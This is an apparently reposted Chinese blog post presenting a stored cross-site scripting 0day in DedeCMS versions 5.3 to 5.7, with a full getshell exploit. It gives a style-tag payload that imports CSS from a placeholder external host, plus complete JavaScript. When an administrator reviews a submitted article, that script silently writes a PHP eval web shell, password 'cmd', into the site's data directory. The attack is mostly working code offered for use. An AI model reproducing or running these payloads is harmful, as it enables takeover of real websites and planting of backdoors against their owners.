DeDecms xss 通杀0day 附getshell EXP

作者:haris

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

650) this.width=650;” class=”aligncenter size-full wp-image-503″ title=”webpi.ashx” src=”http://cdn.verydemo.com/upload/2013_04_05/13651335821480.png” alt=”” width=”200″ height=”200″ >

下面说说利用方法。条件有3个:1.开启注册2.开启投稿

3.管理员很勤劳,会去审核文章,最鸡肋的地方了

注册会员—-发表文章

内容填写:

<style>@im\port’\http://xxx.com/xss.css’;</style>

新建XSS.CXXbody{background-image:url('javascript:document.write("")')}

新建xss.js

内容

var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();if(request.overrideMimeType) {request.overrideMimeType('text/xml');}} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i try {request = new ActiveXObject(versions[i]);} catch(e) {}}}xmlhttp=request;function getFolder( url ){obj = url.split('/')return obj[obj.length-2]}oUrl = top.location.href;u = getFolder(oUrl);add_admin();function add_admin(){var url= "/"+u+"/sys_sql_query.php";var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST", url, true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length", params.length);xmlhttp.setRequestHeader("Connection", "Keep-Alive");xmlhttp.send(params);}

当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd

快乐不是因为得到的多而是因为计较的少!

DeDecms xss 通杀0day 附getshell EXP

相关文章:

你感兴趣的文章:

标签云: